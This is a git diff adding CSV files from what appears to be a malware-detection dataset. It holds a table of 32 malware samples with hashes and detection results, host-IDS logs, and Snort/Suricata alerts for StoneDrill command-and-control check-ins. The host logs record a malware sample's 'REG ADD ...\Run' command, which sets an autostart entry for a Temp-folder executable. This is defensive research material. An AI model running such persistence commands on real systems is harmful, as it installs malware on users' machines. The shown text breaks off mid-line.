diff --git a/Malware_Samples_Overview.csv b/Malware_Samples_Overview.csv new file mode 100644 index 0000000..79cf03a --- /dev/null +++ b/Malware_Samples_Overview.csv @@ -0,0 +1,40 @@ +Sample_ID,Category,Sample_Name,Source_Name,First_Submission,Sample_Type,Virustotal,Result_NIDS,Result_HIDS_3,Result_HIDS_1,Result_HIDS_2,Sample_MD5,Sample_SHA256 +1,Cryptominer,Generic.Application.CoinMiner,DAS MALWERK,2018-08-28,"Win32 EXE +",61/71,1,1,0,0,c22908fe460312d76b50129aa3ef2cf2,46f79c451e652fc4ce7ad5a6f9eb737642077c128e514c889458220ed6985913 +2,Backdoor,Win32:Malware-gen,VirusBay,2020-03-26,"Win32 EXE +",35/73,0,1,0,0,e6a132e279806cc95684dc2bd67a0da0,ba07e07a2c279246901b613a26ed95dc37bce9e0aa1ba17d5e812a8e84bda164 +3,Backdoor,Trojan-Banker.Agent,VirusBay,2019-12-03,"Win32 EXE +",37/68,1,0,0,0,aa52c9a86073b75748ec6c98eca17dab,09ab5a3c9583ed5cf63fc2e4641c7774edfd84127af69faacde4628881cbe157 +4,Backdoor,Trojan.DCRAT,ANY RUN,2020-05-13,Win32 EXE,48/72,0,1,,,1e2611836860d60a2a6b4c560ef74650,e67ac2ffa5e650be9139de22f0e543f1e3c84823e86abd80135d6117b2bc8060 +5,Backdoor,Trojan.Qbot,ANY RUN,2020-05-28,VBS,-,1,1,,,1c347009d6fce779bca8385395f26f94,2e57d9a80d45e2d78453c91829873260cdce4ac5f2cada73421a4a1faadbd445 +6,Backdoor,Trojan.Agent.Zenpak,VirusBay,2019-04-24,"Win32 EXE +",58/72,0,0,,,fbe6d341c1b69975be74616d01c6d273,ec6097c4fdbe0736e416b58be0a4dd042c46a9cf7eef997b3eb72384609cbca9 +7,Backdoor,Shadowhammer,VirusBay,2019-3-27,application/x-rar,2/55,0,0,,,c09e41b3eb42eb79853de5bd1f5a5830,03466caff060a816688eb35f10b9bf3b8d44c364fde620cbb4e2c0c23309df79 +8,Backdoor,Backdoor.AsyncRAT,Virus Share,2019-08-12,"Win32 EXE +",54/73,0,1,,,9f16a651f918972eee7be4f19d40bb91,041a4f5c60d5186913c46f9e0b246354f0944b03eb7d61325a60ae338faebbc8 +9,Backdoor,"Backdoor.Bladabindi +",Virus Share,2019-08-26,Win32 EXE,66/72,0,1,0,0,c2c057d9645af7f64e9d11672840828e,a2dc89b1aa5e3b6ff023b87a45756f50c667d94e44fff760ddea39a2c07a100d +10,Spyware,TrojanSpy.Win32,Virus Share,2019-02-18 ,Win32 EXE,60/69,-,-,,,19b11aa448409adc15c93e1fdd3c6774,2016ce2662c71ee8d4e63d5282ffe0c860ba95d3e8cff98462a9fdbef5211f9a +11,Spyware,Trojan.Spyware,VirusBay,2019-10-14,Win32 EXE,61/71,1,0,,,40c0304b144736668ca2a0217d296c37,e24e4cf5454cbc5026f1a47d083ab22d6b823190ab72866601bfba07d3f0abf6 +12,Spyware,HTML.SpyAgent,Virus Share,2020-02-10,html,30/60,1,0,,,3b926d275ef56bb063d1e37042f211a3,fb0771b8040167e4b9510fe044a2357a0f4adc54f3bc5ab7a40cbae7ebd81d62 +13,Spyware,Keylogger.HawkEye,VirusBay,2020-01-30,Win32 EXE,47/72,1,1,,,8d897a409a231c4bdb21ac3bcf9118b1,b008c96b1ba6c13c4e922202baad57e199d9dee32a97a1443548c8a0ca303492 +14,Spyware,Spyware.PasswordStealer,Virus Share,2020-03-10,Win32 EXE,53/72,0,0,0,0,69ad26a3aae3e2950e5a93ccc0cd1859,f2f275ca7e7d46c5ddd0e59fa845f59ab527cc5284f16c64104d67599ab933c7 +15,Spyware,Trojan.GenKryptik,Virus Share,2020-02-06,Win32 EXE,55/73,0,0,0,0,9530e5c9e8591d5025e11a20f604520b,b64774a74e66515fbb11fed9bbba117b391f872d0b7b847acec67a4227de99a0 +16,Ransomware,Ransom.Cryakl,VirusBay,2020-03-02,Win32 EXE,55/73,0,1,0,0,23a8bfb5bdbff2f294506019cf2f425f,0fa979b1f894b44984d8ada55962e73dc48bd01359475e079aab4325503dded4 +17,Ransomware,Ramsom.Balaclav,VirusBay,2020-03-01,Win32 EXE,27/72,0,0,0,0,7ed4882c2a0d24c401cbce7536ddf792,5de4af86a4410fb6a4c7d54ba4586d35b6abbf2da183fed30ec71547a0a9f319 +18,Ransomware,Ransom.Ryuk,VirusBay,2020-01-14,Win32 EXE,55/72,0,1,,1,3f5da05d62a70eb1212db39d5d6cf45e,f361afd4dd267d6f74f262033b700da652b4da1c0a21e14a8a468f6093d48e31 +19,Ransomware,Trojan.DOCX,VirusBay,2019-11-19 ,DOCX,35/62,0,1,0,0,1a26c9b6ba40e4e3c3dce12de266ae10,6ccb6c2b2c074eea6e1bd9bb7ff2841fdf5466c646780a7644fbd907098f5b27 +20,Spyware,Trojan.Lucifer,ANY RUN,2020-03-20,Win32 EXE,51/71,1,1,0,0,66a3124fe4ed45fae20e2bd4ee33c626,630efa1e2dc642799b867363bb36d1953884480ac29942a1ab20243a8a9620ad +21,Adware,Adware.Linkvertise,ANY RUN,2020-04-06,Win32 EXE,13/72,1,0,0,0,25fcd5a2cc5590630ab8d971e82b70cb,422ea9cb2110591c932a58f32c8672aba1b08d3dd3e1d53c1edba0101b79174e +22,Rootkit,Rootkit.Bandios,ANY RUN,2018-03-23,Win32 EXE,52/71,0,0,0,0,4b042bfd9c11ab6a3fb78fa5c34f55d0,59c662a5207c6806046205348b22ee45da3f685fe022556716dbbd6643e61834 +23,Ransomware,Ransom.GandCrab,ANY RUN,2020-05-18,Win32 EXE,36/72,1,1,,,d543a6c58e8e92d0b2f33abb270a4c3d,e94f7acb84d2b58a3019627ca866d1424f4d35520eb0da2fe33c1204b51545f2 +24,Cryptominer,Miner.XMRig,ANY RUN,2019-08-24,Win32 EXE,56/71,0,0,,,5616a3471565d34d779b5b3d0520bb70,9194b57673209c8534888f61b0cdefa34f463ae50cd78f72ab2b3348220baaf9 +25,Cryptominer,Miner.lemon_duck,ANY RUN,2020-05-25,ps1,-,1,1,,,28b80843b13fab0986479b54310c8053,2520779dbaa8eebfde61aa4193bf75a44a89f8a7a8dcce12072f7fea1956b53d +26,Cryptominer,Trojan.Glupteba.Qwertyminer,ANY RUN,2020-05-04 ,Win32 EXE,60/72,1,0,,,d668e0990354d0ae209ec520cb80e052,5eb910915a13863b04317d17244c8d68cf9fad949f6ab6e5182861160f099e5f +27,Cryptominer,Miner.Tofsee,ANY RUN,2020-03-12,Win32 EXE,53/73,1,1,,,488bfb786944d1b236ac6254eb97dd69,3787e0f44b282dfcb0238c072490f8fd36c22fa40b1895dd52abed931e5385d3 +28,Rootkit,Rootkit.Lamberts,Virus Share,2019-08-01,Win32 EXE,55/73,0,1,,,a00918f782ba83aa405614430c65aab6,adf6c75d1265e189036d4b5303feaeecb83f6d60db54c36544c43790cde26ace +29,Adware,Adware.Mindspark,Virus Share,2020-03-12 ,Win32 EXE,40/72,0,0,,,aeb471c20095e7d8557478a518d0fc8c,7e22bfc85e7cbd2ebca4f8f7900067b596cd5a8179acc2f211715ea230c41f0a +30,Adware,Adware.Sogou,Virus Share,2020-03-30,Win32 EXE,48/73,1,0,,,775307b867b19872f49aaa9fcc7c6800,013490159463a92d1f6f5b73618dcd143e3d9948fb82f094440368494db03659 +31,Adware,Adware.FusionCore,Virus Share,2020-04-15,Win32 EXE,20/72,0,1,,,d4ce88978ea01afe4ec930e59f9abf61,"248dfd79d264aae38e13502609ce771e4ce0be63747d0c1e0c933e2ce0ebe097 +" +32,Adware,Adware.Unruy,Virus Share,2019-09-04,Win32 EXE,55/68,1,0,,,3a4c09aba1b399a43a65a27aee9c90e0,369ed4c562a09c275e87bd6bed8c93b51b8460eb0cafd506dff8417ffdf5fba7 diff --git a/data/MW_11_HIDS_3.csv b/data/MW_11_HIDS_3.csv new file mode 100644 index 0000000..402a65b --- /dev/null +++ b/data/MW_11_HIDS_3.csv @@ -0,0 +1,49 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 28, 2020 @ 13:22:12.959",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\NETWORK SERVICE; ClientProcessId = 5600; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Product FROM Win32_BaseBoard; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 28, 2020 @ 13:21:49.944",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '27300ec6be2cfda4d500eefcbc4b10bb' +New md5sum is : '493b3b79baa4e287a340e5208a74d0bf' +Old sha1sum was: '685578e969396191bfb7c8bee92758a0267d52d6' +New sha1sum is : 'a1a3c1396dd3e1aab1a289c3e05d7742f33dd7a3' +", +"May 28, 2020 @ 13:21:49.929",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '7b36002bf72275589ffef5f6fc1a89c6' +New md5sum is : '31795626566594565f825d3dd21c4a1b' +Old sha1sum was: 'a2d59c332c46bedea96282e398f570f4032d8d5b' +New sha1sum is : '37c1e2f897e63b8f8da74b8417d2353b2fb9c0b3' +", +"May 28, 2020 @ 13:20:24.537",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 28, 2020 @ 13:20:15.707",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 28, 2020 @ 13:16:08.252",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:50:22.647 +ProcessGuid: {df9fc3d3-b38e-5ecf-0000-001084d02200} +ProcessId: 5724 +Image: C:\Windows\SysWOW64\reg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\RESTART_STICKY_NOTESS +Details: C:\Users\JOHNWI~1\AppData\Local\Temp\StikyNote.exe""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RESTART_STICKY_NOTESS","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:22.648944600Z"",""eventRecordID"":""2033"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:50:22.647\r\nProcessGuid: {df9fc3d3-b38e-5ecf-0000-001084d02200}\r\nProcessId: 5724\r\nImage: C:\\Windows\\SysWOW64\\reg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RESTART_STICKY_NOTESS\r\nDetails: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\StikyNote.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:50:22.647"",""processGuid"":""{df9fc3d3-b38e-5ecf-0000-001084d02200}"",""processId"":""5724"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\reg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\RESTART_STICKY_NOTESS"",""details"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\StikyNote.exe""}}}","C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\StikyNote.exe" +"May 28, 2020 @ 13:16:08.220",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:22.635 +ProcessGuid: {df9fc3d3-b38e-5ecf-0000-001084d02200} +ProcessId: 5724 +Image: C:\Windows\SysWOW64\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d ""C:\Users\JOHNWI~1\AppData\Local\Temp\StikyNote.exe"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587 +ParentProcessGuid: {df9fc3d3-b38e-5ecf-0000-0010e3ca2200} +ParentProcessId: 4776 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d ""C:\Users\JOHNWI~1\AppData\Local\Temp\StikyNote.exe""""","REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\StikyNote.exe\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:22.639126700Z"",""eventRecordID"":""2032"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:22.635\r\nProcessGuid: {df9fc3d3-b38e-5ecf-0000-001084d02200}\r\nProcessId: 5724\r\nImage: C:\\Windows\\SysWOW64\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\StikyNote.exe\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587\r\nParentProcessGuid: {df9fc3d3-b38e-5ecf-0000-0010e3ca2200}\r\nParentProcessId: 4776\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /c REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\StikyNote.exe\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:22.635"",""processGuid"":""{df9fc3d3-b38e-5ecf-0000-001084d02200}"",""processId"":""5724"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \\\""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\StikyNote.exe\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587"",""parentProcessGuid"":""{df9fc3d3-b38e-5ecf-0000-0010e3ca2200}"",""parentProcessId"":""4776"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /c REG ADD HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v RESTART_STICKY_NOTESS /f /t REG_SZ /d \\\""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\StikyNote.exe\\\""""}}}", +"May 28, 2020 @ 13:15:58.499",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 7104; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, diff --git a/data/MW_11_NIDS.csv b/data/MW_11_NIDS.csv new file mode 100644 index 0000000..b1a910a --- /dev/null +++ b/data/MW_11_NIDS.csv @@ -0,0 +1,159 @@ +"@timestamp",message,"log.file.path" +"May 28, 2020 @ 13:24:34.073","05/28/2020-13:24:28.152599 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49730 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:24:32.138","05/28-13:24:27.783879 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49730 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:24:25.119","05/28-13:24:17.047834 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49729 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:24:19.019","05/28/2020-13:24:17.480930 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49729 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:24:12.015","05/28/2020-13:24:06.741714 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49728 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:24:10.115","05/28-13:24:06.453966 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49728 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:24:03.111","05/28-13:23:54.111967 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49727 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:23:56.908","05/28/2020-13:23:54.863852 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49727 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:49.905","05/28/2020-13:23:43.847547 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49724 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:48.109","05/28-13:23:43.565839 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49724 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:23:34.899","05/28/2020-13:23:32.262467 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49723 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:33.106","05/28-13:23:31.973272 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49723 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:23:27.880","05/28/2020-13:23:20.300903 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49722 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:26.104","05/28-13:23:19.324741 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49722 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:23:12.812","05/28/2020-13:23:08.961232 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:11.100","05/28-13:23:08.636763 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:23:05.791","05/28/2020-13:23:02.348168 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49720 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:23:03.966","05/28-13:23:02.054105 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49720 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:58.788","05/28/2020-13:22:56.753812 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49719 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:56.963","05/28-13:22:56.481856 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49719 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:53.962","05/28-13:22:50.913013 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49718 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:51.784","05/28/2020-13:22:51.195145 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49718 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:48.758","05/28/2020-13:22:45.617551 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49717 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:46.926","05/28-13:22:45.288667 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49717 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:43.924","05/28-13:22:39.543029 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49715 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:41.757","05/28/2020-13:22:39.922313 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49715 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:36.922","05/28-13:22:33.567205 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49714 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:34.754","05/28/2020-13:22:34.222391 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49714 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:31.752","05/28/2020-13:22:28.042449 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49712 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:31.752","05/28/2020-13:22:28.286183 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49713 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:29.920","05/28-13:22:28.030603 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49713 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:16.748","05/28/2020-13:22:14.146299 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49709 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:14.916","05/28-13:22:13.543414 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49709 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:11.895","05/28-13:22:07.977105 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49705 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:09.743","05/28/2020-13:22:08.271426 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49705 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:04.892","05/28-13:22:02.238412 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49704 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:02.740","05/28/2020-13:22:02.533789 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49704 -> 